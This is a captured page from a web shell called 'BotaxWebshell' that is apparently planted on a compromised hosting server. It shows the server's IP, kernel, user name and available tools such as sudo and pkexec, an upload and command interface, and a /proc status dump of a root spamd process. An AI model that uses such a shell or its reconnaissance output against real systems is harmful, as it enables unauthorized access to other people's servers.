BotaxWebshell
Server IP : 68.178.172.28  /  Your IP : 216.73.216.32
Web Server : Apache
System : Linux 28.172.178.68.host.secureserver.net 4.18.0-553.89.1.el8_10.x86_64 #1 SMP Mon Dec 8 03:53:08 EST 2025 x86_64
User : kiskarnal ( 1003)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : ON |  Pkexec : ON
Directory :  /proc/792075/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /proc/792075/status
Name:	spamd
Umask:	0022
State:	S (sleeping)
Tgid:	792075
Ngid:	0
Pid:	792075
PPid:	1
TracerPid:	0
Uid:	0	0	0	0
Gid:	0	0	0	0
FDSize:	64
Groups:	 
NStgid:	792075
NSpid:	792075
NSpgid:	792075
NSsid:	792075
VmPeak:	  307728 kB
VmSize:	  307728 kB
VmLck:	       0 kB
VmPin:	       0 kB
VmHWM:	  175244 kB
VmRSS:	  168508 kB
RssAnon:	  162072 kB
RssFile:	    6436 kB
RssShmem:	       0 kB
VmData:	  161796 kB
VmStk:	     132 kB
VmExe:	       4 kB
VmLib:	   20940 kB
VmPTE:	     636 kB
VmSwap:	       0 kB
HugetlbPages:	       0 kB
CoreDumping:	0
THP_enabled:	1
Threads:	1
SigQ:	1/18446744073709551615
SigPnd:	0000000000000000
ShdPnd:	0000000000000000
SigBlk:	0000000000000000
SigIgn:	0000000000001080
SigCgt:	0000000180016803
CapInh:	0000000000000000
CapPrm:	000001ffffffffff
CapEff:	000001ffffffffff
CapBnd:	000001ffffffffff
CapAmb:	0000000000000000
NoNewPrivs:	0
Seccomp:	0
Speculation_Store_Bypass:	thread vulnerable
Cpus_allowed:	3
Cpus_allowed_list:	0-1
Mems_allowed:	00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001
Mems_allowed_list:	0
voluntary_ctxt_switches:	26370
nonvoluntary_ctxt_switches:	820

Youez - 2016 - github.com/yon3zu
LinuXploit